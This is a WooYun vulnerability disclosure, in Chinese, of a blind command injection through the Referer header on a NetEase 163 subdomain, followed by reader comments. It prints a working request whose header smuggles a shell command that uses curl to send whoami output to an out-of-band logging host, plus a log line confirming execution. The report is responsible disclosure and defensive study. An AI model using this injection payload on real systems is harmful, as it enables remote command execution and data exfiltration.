网易163某站点存在隐式命令注入

编号192038
Urlhttp://www.wooyun.org/bug.php?action=view&id=192038
漏洞状态厂商已经确认
漏洞标题网易163某站点存在隐式命令注入
漏洞类型命令执行
厂商网易
白帽子lijiejie
提交日期2016-04-03 11:19:00
公开日期2016-05-22 13:40:00
修复时间(not set)
确认时间2016-04-07 00:00:00
Confirm Spend4
漏洞标签
关注数0
收藏数0
白帽评级
白帽自评rank14
厂商评级
厂商评rank10
漏洞简介
网易163某站点存在隐式命令注入,可远程执行任意Linux命令
漏洞细节

存在命令注入的是paopao.163.com的Referer,怀疑是某个日志分析服务的问题:

GET /search/sycProduct HTTP/1.1
Referer: $(curl http://paopao3.xxxx.dnslog.info/?whoami=`whoami`)
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13D15 MicroMessenger/6.3.13 NetType/WIFI Language/en
Host: www.paopao.163.com
Accept-Encoding: gzip,deflate
Accept: */*


上面我注入了curl和whoami命令。这个地方并不会马上导致命令执行,而是每天凌晨大约0点到2点钟被执行到。

POC

paopao.163.brce.png


如上图所示,实际上paopao3和163这个子域名都被成功打回了。
whoami命令也被成功执行了,当前用户是appops:

[03/Apr/2016:00:57:22 +0800] 223.252.218.194 - - paopao3.xxxx.dnslog.info GET /?whoami=appops HTTP/1.1 200 "curl/7.26.0" "-"


paopao.163.brce.2.png

修复方案

过滤,比如去掉$(和`符号

状态信息 2016-04-03: 细节已通知厂商并且等待厂商处理中
2016-04-07: 厂商已经确认,细节仅向厂商公开
2016-04-17: 细节向核心白帽子及相关领域专家公开
2016-04-27: 细节向普通白帽子公开
2016-05-07: 细节向实习白帽子公开
2016-05-22: 细节向公众公开
厂商回复漏洞已修复,感谢您对网易的支持。
回应信息危害等级:中漏洞Rank:10 确认时间:2016-04-07 13:37
Showing 1-23 of 23 items.
评论内容评论人点赞数评论时间

是什么原理啊 怎么发现呢

YiYang02016-05-22 13:57:00

为何受伤的总是网易。

蓝冰02016-04-17 11:15:00

哥哥我只要一回复,上面的一群人还有关注的人都会收到提示信息!!!

sysALong02016-04-07 16:01:00

修复了赶紧公开看看啊@网易

sauce02016-04-07 15:37:00

mark

追寻02016-04-05 09:13:00

估计是 Http响应一类的http request

Aasron02016-04-04 17:39:00

@Exploit DB MySQL隐形的类型

YangCL02016-04-04 17:17:00

不急不急 春节那一天虽然漏洞冻结了 但我的一个漏洞还是在半个小时后审核通过 但有一次一个政府网站的sql审核了一个月 @Can

Code Life02016-04-04 14:01:00

@Can 急啥…

HackPanda02016-04-04 12:41:00

@Can 首先你的漏洞必须是高危害 之前川神在群里说过一句话 渣渣漏洞就不要催审核了

Exploit DB02016-04-04 12:17:00

@xsser 大哥能去审核一下我的漏洞吗?乌云就这个效率吗

Can02016-04-04 11:38:00

看标题就觉得很屌!

大师兄02016-04-03 17:34:00

感觉又有52G的库

Code Life02016-04-03 16:30:00

不回显吗?

scanf02016-04-03 16:21:00

...漏洞大把

hkcs02016-04-03 16:02:00

啥叫隐式命令注入,求科普

冷白开。02016-04-03 14:33:00

日了狗

xsser02016-04-03 14:18:00

命令盲注

ucifer02016-04-03 13:56:00

mark

ArcticWolf02016-04-03 12:40:00

无回显

HackPanda02016-04-03 11:50:00

马克,坐等公开

Mark0smith02016-04-03 11:34:00

李姐姐 能不能告诉我什么叫隐式命令注入 新姿势想学习下...

Exploit DB02016-04-03 11:26:00

666

Aasron02016-04-03 11:21:00